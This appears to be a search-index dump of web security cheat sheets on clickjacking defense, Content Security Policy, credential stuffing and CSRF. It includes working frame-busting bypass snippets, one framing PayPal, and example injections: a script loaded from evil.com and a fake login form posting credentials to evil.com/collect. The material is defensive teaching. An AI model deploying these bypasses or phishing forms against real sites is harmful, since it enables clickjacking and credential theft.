"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#insecure-non-working-scripts-do-not-use","title":"Insecure Non-Working Scripts DO NOT USE","text":"

Consider the following snippet which is NOT recommended for defending against clickjacking:

<script>if (top!=self) top.location.href=self.location.href</script>\n

This simple frame breaking script attempts to prevent the page from being incorporated into a frame or iframe by forcing the parent window to load the current frame's URL. Unfortunately, multiple ways of defeating this type of script have been made public. We outline some here.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#double-framing","title":"Double Framing","text":"

Some frame busting techniques navigate to the correct page by assigning a value to parent.location. This works well if the victim page is framed by a single page. However, if the attacker encloses the victim in one frame inside another (a double frame), then accessing parent.location becomes a security violation in all popular browsers, due to the descendant frame navigation policy. This security violation disables the counter-action navigation.

Victim frame busting code:

if(top.location != self.location) {\nparent.location = self.location;\n}\n

Attacker top frame:

<iframe src=\"attacker2.html\">\n

Attacker sub-frame:

<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#the-onbeforeunload-event","title":"The onBeforeUnload Event","text":"

A user can manually cancel any navigation request submitted by a framed page. To exploit this, the framing page registers an onBeforeUnload handler which is called whenever the framing page is about to be unloaded due to navigation. The handler function returns a string that becomes part of a prompt displayed to the user.

Say the attacker wants to frame PayPal. He registers an unload handler function that returns the string \"Do you want to exit PayPal?\". When this string is displayed, the user is likely to cancel the navigation, defeating PayPal's frame busting attempt.

The attacker mounts this attack by registering an unload event on the top page using the following code:

<script>\nwindow.onbeforeunload = function(){\nreturn \"Asking the user nicely\";\n}\n</script>\n\n<iframe src=\"http://www.paypal.com\">\n

PayPal's frame busting code will generate a BeforeUnload event activating our function and prompting the user to cancel the navigation event.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#no-content-flushing","title":"No-Content Flushing","text":"

While the previous attack requires user interaction, the same attack can be done without prompting the user. Most browsers (IE7, IE8, Google Chrome, and Firefox) enable an attacker to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting a navigation request to a site responding with \"204 - No Content\".

Navigating to a No Content site is effectively a NOP, but flushes the request pipeline, thus canceling the original navigation request. Here is sample code to do this:

var killbust = 0\nwindow.onbeforeunload = function() { killbust++ }\nsetInterval( function() {\nif(killbust > 0){\nkillbust = 2;\nwindow.top.location = 'http://nocontent204.com'\n}\n}, 1);\n
<iframe src=\"http://www.victim.com\">\n
"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#exploiting-xss-filters","title":"Exploiting XSS filters","text":"

IE8 and Google Chrome introduced reflective XSS filters that help protect web pages from certain types of XSS attacks. Nava and Lindsay (at Blackhat) observed that these filters can be used to circumvent frame busting code. The IE8 XSS filter compares given request parameters to a set of regular expressions in order to look for obvious attempts at cross-site scripting. Using \"induced false positives\", the filter can be used to disable selected scripts. By matching the beginning of any script tag in the request parameters, the XSS filter will disable all inline scripts within the page, including frame busting scripts. External scripts can also be targeted by matching an external include, effectively disabling all external scripts. Since a subset of the JavaScript on the page (inline or external) is still functional and cookies are still available, this attack is effective for clickjacking.

Victim frame busting code:

<script>\nif(top != self) {\ntop.location = self.location;\n}\n</script>\n

Attacker:

<iframe src=\"http://www.victim.com/?v=<script>if''>\n

The XSS filter will match that parameter <script>if to the beginning of the frame busting script on the victim and will consequently disable all inline scripts in the victim's page, including the frame busting script. The XSSAuditor filter available for Google Chrome enables the same exploit.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#clobbering-toplocation","title":"Clobbering top.location","text":"

Several modern browsers treat the location variable as a special immutable attribute across all contexts. However, this is not the case in IE7 and Safari 4.0.4 where the location variable can be redefined.

IE7: Once the framing page redefines location, any frame busting code in a subframe that tries to read top.location will commit a security violation by trying to read a local variable in another domain. Similarly, any attempt to navigate by assigning top.location will fail.

Victim frame busting code:

if(top.location != self.location) {\ntop.location = self.location;\n}\n

Attacker:

<script>var location = \"clobbered\";</script>\n<iframe src=\"http://www.victim.com\"></iframe>\n

Safari 4.0.4:

We observed that although location is kept immutable in most circumstances, when a custom location setter is defined via __defineSetter__ (through window) the object location becomes undefined.

The framing page simply does:

<script>\nwindow.__defineSetter__(\"location\", function(){});\n</script>\n

Now any attempt to read or navigate the top frame's location will fail.

"},{"location":"cheatsheets/Clickjacking_Defense_Cheat_Sheet.html#restricted-zones","title":"Restricted zones","text":"

Most frame busting relies on JavaScript in the framed page to detect framing and bust itself out. If JavaScript is disabled in the context of the subframe, the frame busting code will not run. There are unfortunately several ways of restricting JavaScript in a subframe:

In IE 8:

<iframe src=\"http://www.victim.com\" security=\"restricted\"></iframe>\n

In Chrome:

<iframe src=\"http://www.victim.com\" sandbox></iframe>\n

Firefox and IE:

Activate designMode in the parent page.

document.designMode = \"on\";\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html","title":"Content Security Policy Cheat Sheet","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article describes a way to integrate the defense in depth concept into the client side of web applications. When the server sends Content-Security-Policy (CSP) headers, the browser becomes aware of, and capable of protecting the user from, dynamic calls that load content into the page currently being visited.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#context","title":"Context","text":"

The increase in XSS (Cross-Site Scripting), clickjacking, and cross-site leak vulnerabilities demands a more defense in depth security approach.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-xss","title":"Defense against XSS","text":"

CSP defends against XSS attacks in the following ways:

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-restricting-inline-scripts","title":"1. Restricting Inline Scripts","text":"

By preventing the page from executing inline scripts, attacks like injecting

<script>document.body.innerHTML='defaced'</script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-restricting-remote-scripts","title":"2. Restricting Remote Scripts","text":"

By preventing the page from loading scripts from arbitrary servers, attacks like injecting

<script src=\"https://evil.com/hacked.js\"></script>\n

will not work.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-restricting-unsafe-javascript","title":"3. Restricting Unsafe JavaScript","text":"

By preventing the page from executing text-to-JavaScript functions like eval, the website will be safe from vulnerabilities like this one:

// A Simple Calculator\nvar op1 = getUrlParameter(\"op1\");\nvar op2 = getUrlParameter(\"op2\");\nvar sum = eval(`${op1} + ${op2}`);\nconsole.log(`The sum is: ${sum}`);\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#4-restricting-form-submissions","title":"4. Restricting Form submissions","text":"

By restricting where HTML forms on your website can submit their data, injecting phishing forms won't work either.

<form method=\"POST\" action=\"https://evil.com/collect\">\n<h3>Session expired! Please login again.</h3>\n<label>Username</label>\n<input type=\"text\" name=\"username\"/>\n\n<label>Password</label>\n<input type=\"password\" name=\"pass\"/>\n\n<input type=\"Submit\" value=\"Login\"/>\n</form>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#5-restricting-objects","title":"5. Restricting Objects","text":"

And by restricting the HTML object tag, it also won't be possible for an attacker to inject malicious flash/Java/other legacy executables on the page.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-against-framing-attacks","title":"Defense against framing attacks","text":"

Attacks like clickjacking and some variants of browser side-channel attacks (xs-leaks) require a malicious website to load the target website in a frame.

Historically the X-Frame-Options header has been used for this, but it has been obsoleted by the frame-ancestors CSP directive.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

A strong CSP provides an effective second layer of protection against various types of vulnerabilities, especially XSS. Although CSP doesn't prevent web applications from containing vulnerabilities, it can make those vulnerabilities significantly more difficult for an attacker to exploit.

Even on a fully static website, which does not accept any user input, a CSP can be used to enforce the use of Subresource Integrity (SRI). This can help prevent malicious code from being loaded on the website if one of the third-party sites hosting JavaScript files (such as analytics scripts) is compromised.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-is-not-a-substitute-for-secure-development","title":"CSP is not a substitute for secure development","text":"

CSP should not be relied upon as the only defensive mechanism against XSS. You must still follow good development practices such as the ones described in Cross-Site Scripting Prevention Cheat Sheet, and then deploy CSP on top of that as a bonus security layer.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#policy-delivery","title":"Policy Delivery","text":"

You can deliver a Content Security Policy to your website in three ways.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#1-content-security-policy-header","title":"1. Content-Security-Policy Header","text":"

Send a Content-Security-Policy HTTP response header from your web server.

Content-Security-Policy: ...\n

Using a header is the preferred way and supports the full CSP feature set. Send it in all HTTP responses, not just the index page.
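A minimal sketch of doing this in a Node.js/Express application (the framework and the policy value are illustrative) is a middleware that sets the header on every response:

const express = require('express');
const app = express();

// Attach the CSP header to every response, not just the index page.
app.use((req, res, next) => {
  res.setHeader(
    'Content-Security-Policy',
    "default-src 'self'; frame-ancestors 'self'; form-action 'self'"
  );
  next();
});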

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#2-content-security-policy-report-only-header","title":"2. Content-Security-Policy-Report-Only Header","text":"

Using the Content-Security-Policy-Report-Only header, you can deliver a CSP that doesn't get enforced.

Content-Security-Policy-Report-Only: ...\n

Still, violation reports are printed to the console and delivered to a violation endpoint if the report-to and report-uri directives are used.

Browsers fully support the ability of a site to use both Content-Security-Policy and Content-Security-Policy-Report-Only together, without any issues. This pattern can be used for example to run a strict Report-Only policy (to get many violation reports), while having a looser enforced policy (to avoid breaking legitimate site functionality).
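For example (the policy values and report path are illustrative), a site might enforce a modest policy while monitoring a stricter one:

Content-Security-Policy: default-src 'self'; frame-ancestors 'self'
Content-Security-Policy-Report-Only: default-src 'none'; script-src 'self'; report-uri /csp-reports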

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#3-content-security-policy-meta-tag","title":"3. Content-Security-Policy Meta Tag","text":"

Sometimes you cannot use the Content-Security-Policy header, for example when deploying your HTML files on a CDN where the headers are out of your control.

In this case, you can still use CSP by specifying a http-equiv meta tag in the HTML markup, like so:

<meta http-equiv=\"Content-Security-Policy\" content=\"...\">\n

Almost everything is still supported, including full XSS defenses. However, you will not be able to use framing protections, sandboxing, or a CSP violation logging endpoint.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#http-headers","title":"HTTP Headers","text":"

The following are headers for CSP.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-directives","title":"CSP Directives","text":"

Multiple types of directives exist that allow the developer to control the behaviour of the policy at a granular level.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#fetch-directives","title":"Fetch Directives","text":"

Fetch directives tell the browser the locations to trust and load resources from.

Most fetch directives have a certain fallback list specified in the W3C specification. This list allows for granular control of the source of scripts, images, files, etc.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#document-directives","title":"Document Directives","text":"

Document directives instruct the browser about the properties of the document to which the policies will apply.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#navigation-directives","title":"Navigation Directives","text":"

Navigation directives instruct the browser about the locations that the document can navigate to.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#reporting-directives","title":"Reporting Directives","text":"

Reporting directives deliver violations of prevented behaviors to specified locations. These directives serve no purpose on their own and are dependent on other directives.

In order to ensure backward compatibility, use the two directives in conjunction. Whenever a browser supports report-to, it will ignore report-uri. Otherwise, report-uri will be used.
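For example (the endpoint URL and group name are placeholders), a policy can carry both reporting directives; note that the report-to group must also be declared to the browser through the Reporting API headers:

Content-Security-Policy: default-src 'self'; report-uri https://example.com/csp-reports; report-to csp-endpoint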

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#special-directive-sources","title":"Special Directive Sources","text":"Value Description 'none' No URLs match. 'self' Refers to the origin site with the same scheme and port number. 'unsafe-inline' Allows the usage of inline scripts or styles. 'unsafe-eval' Allows the usage of eval in scripts. 'strict-dynamic' Informs the browser to trust scripts originating from a root trusted script.

Note: strict-dynamic is not a standalone directive and should be used in combination with other directive values, such as nonce, hashes, etc.

To better understand how the directive sources work, check out the source lists from w3c.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#hashes","title":"Hashes","text":"

When inline scripts are required, the script-src 'hash_algo-hash' is one option for allowing only specific scripts to execute.

Content-Security-Policy: script-src 'sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='\n

To get the hash, look at Google Chrome developer tools for violations like this:

\u274c Refused to execute inline script because it violates the following Content Security Policy directive: \"...\" Either the 'unsafe-inline' keyword, a hash ('sha256-V2kaaafImTjn8RQTWZmF4IfGfQ7Qsqsw9GWaFjzFNPg='), or a nonce...

You can also use this hash generator. This is a great example of using hashes.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#note","title":"Note","text":"

Using hashes is generally not a very good approach. If you change anything inside the script tag (even whitespace) by, e.g., formatting your code, the hash will be different, and the script won't render.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#nonces","title":"Nonces","text":"

Nonces are unique one-time-use random values that you generate for each HTTP response, and add to the Content-Security-Policy header, like so:

const nonce = uuid.v4();\nscriptSrc += ` 'nonce-${nonce}'`;\n

You would then pass this nonce to your view (using nonces requires non-static HTML) and render script tags that look something like this:

<script nonce=\"<%= nonce %>\">\n...\n</script>\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#warning","title":"Warning","text":"

Don't create a middleware that replaces all script tags with \"script nonce=...\" because attacker-injected scripts will then get the nonces as well. You need an actual HTML templating engine to use nonces.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-dynamic","title":"strict-dynamic","text":"

The strict-dynamic directive can be used in combination with either hashes or nonces.

If the script block is creating additional DOM elements and executing JS inside of them, strict-dynamic tells the browser to trust those elements.

Note that strict-dynamic is a CSP level 3 feature and not very widely supported yet. For more details, check out strict-dynamic usage.

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#csp-sample-policies","title":"CSP Sample Policies","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#basic-csp-policy","title":"Basic CSP Policy","text":"

This policy prevents cross-site framing and cross-site form-submissions. It will only allow resources from the originating domain for all the default level directives and will not allow inline scripts/styles to execute.

If your application functions with these restrictions, it drastically reduces your attack surface and works with most modern browsers.

The most basic policy assumes:

Content-Security-Policy:\u00a0default-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

To tighten further, one can apply the following:

Content-Security-Policy:\u00a0default-src\u00a0'none';\u00a0script-src\u00a0'self';\u00a0connect-src\u00a0'self';\u00a0img-src\u00a0'self';\u00a0style-src\u00a0'self'; frame-ancestors 'self'; form-action 'self';\n

This policy allows images, scripts, AJAX, and CSS from the same origin and does not allow any other resources to load (e.g., object, frame, media, etc.).

"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#upgrading-insecure-requests","title":"Upgrading insecure requests","text":"

If the developer is migrating from HTTP to HTTPS, the following directive will ensure that all requests will be sent over HTTPS with no fallback to HTTP:

Content-Security-Policy: upgrade-insecure-requests;\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#preventing-framing-attacks-clickjacking-cross-site-leaks","title":"Preventing framing attacks (clickjacking, cross-site leaks)","text":""},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#strict-policy","title":"Strict Policy","text":"

A strict policy's role is to protect against classical stored, reflected, and some of the DOM XSS attacks and should be the optimal goal of any team trying to implement CSP.

Google went ahead and set up a guide to adopt a strict CSP based on nonces.

Based on a presentation at LocoMocoSec, the following two policies can be used to apply a strict policy:

script-src 'nonce-r4nd0m' 'strict-dynamic';\nobject-src 'none'; base-uri 'none';\n
script-src 'nonce-r4nd0m';\nobject-src 'none'; base-uri 'none';\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#refactoring-inline-code","title":"Refactoring inline code","text":"

When default-src or script-src* directives are active, CSP by default disables any JavaScript code placed inline in the HTML source, such as this:

<script>\nvar foo = \"314\"\n<script>\n

The inline code can be moved to a separate JavaScript file and the code in the page becomes:

<script src=\"app.js\">\n</script>\n

With app.js containing the var foo = \"314\" code.

The inline code restriction also applies to inline event handlers, so that the following construct will be blocked under CSP:

<button id=\"button1\" onclick=\"doSomething()\">\n

This should be replaced by addEventListener calls:

document.getElementById(\"button1\").addEventListener('click',\u00a0doSomething);\n
"},{"location":"cheatsheets/Content_Security_Policy_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html","title":"Credential Stuffing Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheatsheet covers defences against two common types of authentication-related attacks: credential stuffing and password spraying. Although these are separate, distinct attacks, in many cases the defences that would be implemented to protect against them are the same, and they would also be effective at protecting against brute-force attacks. A summary of these different attacks is listed below:

Attack Type - Description
Brute Force - Testing multiple passwords from a dictionary or other source against a single account.
Credential Stuffing - Testing username/password pairs obtained from the breach of another site.
Password Spraying - Testing a single weak password against a large number of different accounts.
"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

In order to balance security and usability, multi-factor authentication can be combined with other techniques to require the second factor only in specific circumstances where there is reason to suspect that the login attempt may not be legitimate, such as a login from:

Additionally, for enterprise applications, known trusted IP ranges could be added to an allow list so that MFA is not required when users connect from these ranges.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#alternative-defenses","title":"Alternative Defenses","text":"

Where it is not possible to implement MFA, there are many alternative defenses that can be used to protect against credential stuffing and password spraying. In isolation none of these are as effective as MFA, however if multiple defenses are implemented in a layered approach, they can provide a reasonable degree of protection. In many cases, these mechanisms will also protect against brute-force or password spraying attacks.

Where an application has multiple user roles, it may be appropriate to implement different defenses for different roles. For example, it may not be feasible to enforce MFA for all users, but it should be possible to require that all administrators use it.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#secondary-passwords-pins-and-security-questions","title":"Secondary Passwords, PINs and Security Questions","text":"

As well as requiring a user to enter their password when authenticating, they can also be prompted to provide additional security information such as:

It must be emphasised that this does not constitute multi-factor authentication (as both factors are the same - something you know). However, it can still provide a useful layer of protection against both credential stuffing and password spraying where proper MFA can't be implemented.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

Requiring a user to solve a CAPTCHA for each login attempt can help to prevent automated login attempts, which would significantly slow down a credential stuffing or password spraying attack. However, CAPTCHAs are not perfect, and in many cases tools exist that can be used to break them with a reasonably high success rate.

To improve usability, it may be desirable to only require the user to solve a CAPTCHA when the login request is considered suspicious, using the same criteria discussed above.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#ip-block-listing","title":"IP Block-listing","text":"

Less sophisticated attacks will often use a relatively small number of IP addresses, which can be block-listed after a number of failed login attempts. These failures should be tracked separately to the per-user failures, which are intended to protect against brute-force attacks. The block list should be temporary, in order to reduce the likelihood of permanently blocking legitimate users.
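A minimal in-memory sketch of this kind of temporary block-listing is shown below (the threshold, window, and storage are illustrative; a real deployment would keep this state in a shared store such as Redis):

// Track failed login attempts per source IP, separately from per-user lockouts.
const failures = new Map();              // ip -> { count, firstFailure }
const MAX_FAILURES = 20;                 // per-IP threshold before blocking
const BLOCK_WINDOW_MS = 15 * 60 * 1000;  // temporary block/reset window: 15 minutes

function recordFailure(ip) {
  const now = Date.now();
  const entry = failures.get(ip) || { count: 0, firstFailure: now };
  if (now - entry.firstFailure > BLOCK_WINDOW_MS) {
    // The window has expired, so start counting again.
    entry.count = 0;
    entry.firstFailure = now;
  }
  entry.count += 1;
  failures.set(ip, entry);
}

function isBlocked(ip) {
  const entry = failures.get(ip);
  return !!entry &&
         entry.count >= MAX_FAILURES &&
         Date.now() - entry.firstFailure <= BLOCK_WINDOW_MS;
}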

Additionally, there are publicly available block lists of known bad IP addresses which are collected by websites such as AbuseIPDB based on abuse reports from users.

Consider storing the last IP address which successfully logged in to each account; if this IP address is later added to a block list, take appropriate action such as locking the account and notifying the user, as it is likely that their account has been compromised.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#device-fingerprinting","title":"Device Fingerprinting","text":"

Aside from the IP address, there are a number of different factors that can be used to attempt to fingerprint a device. Some of these can be obtained passively by the server from the HTTP headers (particularly the \"User-Agent\" header), including:

Using JavaScript it is possible to access far more information, such as:

Using these various attributes, it is possible to create a fingerprint of the device. This fingerprint can then be matched against any browser attempting to login to the account, and if it doesn't match then the user can be prompted for additional authentication. Many users will have multiple devices or browsers that they use, so it is not practical to block attempts that do not match the existing fingerprints.
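As a rough sketch of the passive, server-side part (the header selection is illustrative; client-side libraries can add many more signals), a coarse fingerprint can be derived by hashing a few request headers:

const crypto = require('crypto');

// Derive a coarse device fingerprint from passively observed request headers.
function headerFingerprint(req) {
  const signals = [
    req.headers['user-agent'] || '',
    req.headers['accept-language'] || '',
    req.headers['accept-encoding'] || '',
  ];
  return crypto.createHash('sha256').update(signals.join('|')).digest('hex');
}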

The fingerprintjs2 JavaScript library can be used to carry out client-side fingerprinting.

It should be noted that as all this information is provided by the client, it can potentially be spoofed by an attacker. In some cases spoofing these attributes is trivial (such as the \"User-Agent\" header), but in other cases it may be more difficult to modify these attributes.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-unpredictable-usernames","title":"Require Unpredictable Usernames","text":"

Credential stuffing attacks rely on not just the re-use of passwords between multiple sites, but also the re-use of usernames. A significant number of websites use the email address as the username, and as most users will have a single email address they use for all their accounts, this makes the combination of an email address and password very effective for credential stuffing attacks.

Requiring users to create their own username when registering on the website makes it harder for an attacker to obtain valid username and password pairs for credential stuffing, as many of the available credential lists only include email addresses. Providing the user with a generated username can provide a higher degree of protection (as users are likely to choose the same username on most websites), but is user unfriendly. Additionally, care needs to be taken to ensure that the generated username is not predictable (such as being based on the user's full name, or sequential numeric IDs), as this could make enumerating valid usernames for a password spraying attack easier.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#defense-in-depth","title":"Defense in Depth","text":"

The following mechanisms are not sufficient to prevent credential stuffing or password spraying attacks; however they can be used to make the attacks more time consuming or technically difficult to implement. This can be useful to defend against opportunistic attackers, who use off-the-shelf tools and are likely to be discouraged by any technical barriers, but will not be sufficient against a more targeted attack.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#multi-step-login-processes","title":"Multi-Step Login Processes","text":"

The majority of off-the-shelf tools are designed for a single step login process, where the credentials are POSTed to the server, and the response indicates whether or not the login attempt was successful. By adding additional steps to this process, such as requiring the username and password to be entered sequentially, or requiring that the user first obtains a random CSRF Token before they can login, this makes the attack slightly more difficult to perform, and doubles the number of requests that the attacker must make.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#require-javascript-and-block-headless-browsers","title":"Require JavaScript and Block Headless Browsers","text":"

Most tools used for these types of attacks will make direct POST requests to the server and read the responses, but will not download or execute JavaScript that was contained in them. By requiring the attacker to evaluate JavaScript in the response (for example to generate a valid token that must be submitted with the request), this forces the attacker to either use a real browser with an automation framework like Selenium or Headless Chrome, or to implement JavaScript parsing with another tool such as PhantomJS. Additionally, there are a number of techniques that can be used to identify Headless Chrome or PhantomJS.

Please note that blocking visitors who have JavaScript disabled will reduce the accessibility of the website, especially to visitors who use screen readers. In certain jurisdictions this may be in breach of equalities legislation.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#identifying-leaked-passwords","title":"Identifying Leaked Passwords","text":"

When a user sets a new password on the application, as well as checking it against a list of known weak passwords, it can also be checked against passwords that have previously been breached. The most well known public service for this is Pwned Passwords. You can host a copy of the application yourself, or use the API.

In order to protect the value of the source password being searched for, Pwned Passwords implements a k-Anonymity model that allows a password to be searched for by partial hash. This allows the first 5 characters of a SHA-1 password hash to be passed to the API.
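A sketch of such a range query is shown below (the URL reflects the public Pwned Passwords API at the time of writing; error handling is omitted, and global fetch assumes Node.js 18 or later):

const crypto = require('crypto');

// Only the first 5 hex characters of the SHA-1 hash ever leave the server.
async function isPwned(password) {
  const sha1 = crypto.createHash('sha1').update(password).digest('hex').toUpperCase();
  const prefix = sha1.slice(0, 5);
  const suffix = sha1.slice(5);
  const res = await fetch(`https://api.pwnedpasswords.com/range/${prefix}`);
  const body = await res.text();
  // Each line of the response is "SUFFIX:COUNT"; a match means the password has appeared in a breach.
  return body.split('\n').some(line => line.split(':')[0].trim() === suffix);
}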

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#notify-users-about-unusual-security-events","title":"Notify users about unusual security events","text":"

When suspicious or unusual activity is detected, it may be appropriate to notify or warn the user. However, care should be taken that the user does not get overwhelmed with a large number of notifications that are not important to them, or they will just start to ignore or delete them.

For example, it would generally not be appropriate to notify a user that there had been an attempt to login to their account with an incorrect password. However, if there had been a login with the correct password, but which had then failed the subsequent MFA check, the user should be notified so that they can change their password.

Details related to current or recent logins should also be made visible to the user. For example, when they login to the application, the date, time and location of their previous login attempt could be displayed to them. Additionally, if the application supports concurrent sessions, the user should be able to view a list of all active sessions, and to terminate any other sessions that are not legitimate.

"},{"location":"cheatsheets/Credential_Stuffing_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Cross-Site Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Cross-Site Request Forgery (CSRF)\u00a0is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site when the user is authenticated. A CSRF attack works because browser requests automatically include all cookies including session cookies. Therefore, if the user is authenticated to the site, the site cannot distinguish between legitimate authorized requests and forged authenticated requests. This attack is thwarted when proper Authorization is used, which implies that a challenge-response mechanism is required that verifies the identity and authority of the requester.

The impact of a successful CSRF attack is limited to the capabilities exposed by the vulnerable application and privileges of the user. For example, this attack could result in a transfer of funds, changing a password, or making a purchase with the user's credentials. In effect, CSRF attacks are used by an attacker to make a target system perform a function via the victim's browser, without the victim's knowledge, at least until the unauthorized transaction has been committed.

In short, the following principles should be followed to defend against CSRF:

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#token-based-mitigation","title":"Token Based Mitigation","text":"

The synchronizer token pattern is one of the most popular and recommended methods to mitigate CSRF.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#use-built-in-or-existing-csrf-implementations-for-csrf-protection","title":"Use Built-In Or Existing CSRF Implementations for CSRF Protection","text":"

Synchronizer token defenses have been built into many frameworks. It is strongly recommended to research if the framework you are using has an option to achieve CSRF protection by default before trying to build your custom token generating system. For example, .NET has built-in protection that adds a token to CSRF vulnerable resources. You are responsible for proper configuration (such as key management and token management) before using these built-in CSRF protections that generate tokens to guard CSRF vulnerable resources.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#synchronizer-token-pattern","title":"Synchronizer Token Pattern","text":"

CSRF tokens should be generated on the server-side. They can be generated once per user session or for each request. Per-request tokens are more secure than per-session tokens as the time range for an attacker to exploit the stolen tokens is minimal. However, this may result in usability concerns. For example, the "Back" button browser capability is often hindered as the previous page may contain a token that is no longer valid. Interaction with this previous page will result in a CSRF false positive security event on the server. In per-session token implementations, after the initial generation of a token, the value is stored in the session and is used for each subsequent request until the session expires.

When a request is issued by the client, the server-side component must verify the existence and validity of the token in the request compared to the token found in the user session. If the token was not found within the request, or the value provided does not match the value within the user session, then the request should be rejected. Additional actions such as logging the event as a potential CSRF attack in progress should also be considered.
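
As a minimal sketch only (not a complete implementation), the following assumes an Express-style application with server-side sessions; the field and header names (_csrf, X-CSRF-Token) are illustrative placeholders:

// Sketch: per-session synchronizer token, assuming an Express-style app with server-side sessions.\nconst crypto = require('crypto');\n\nfunction getCsrfToken(req) {\n// Generate the token once per session and reuse it until the session expires\nif (!req.session.csrfToken) {\nreq.session.csrfToken = crypto.randomBytes(32).toString('hex');\n}\nreturn req.session.csrfToken;\n}\n\nfunction verifyCsrfToken(req) {\n// The token may arrive as a hidden form field or as a custom request header\nconst sent = req.body._csrf || req.get('X-CSRF-Token');\nconst stored = req.session.csrfToken;\nif (!sent || !stored || sent.length !== stored.length) { return false; } // reject, and consider logging a potential CSRF attempt\nreturn crypto.timingSafeEqual(Buffer.from(sent), Buffer.from(stored));\n}\n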

CSRF tokens should be:

CSRF tokens prevent CSRF because without a token, an attacker cannot create valid requests to the backend server.

For the Synchronizer Token Pattern, CSRF tokens should not be transmitted using cookies.

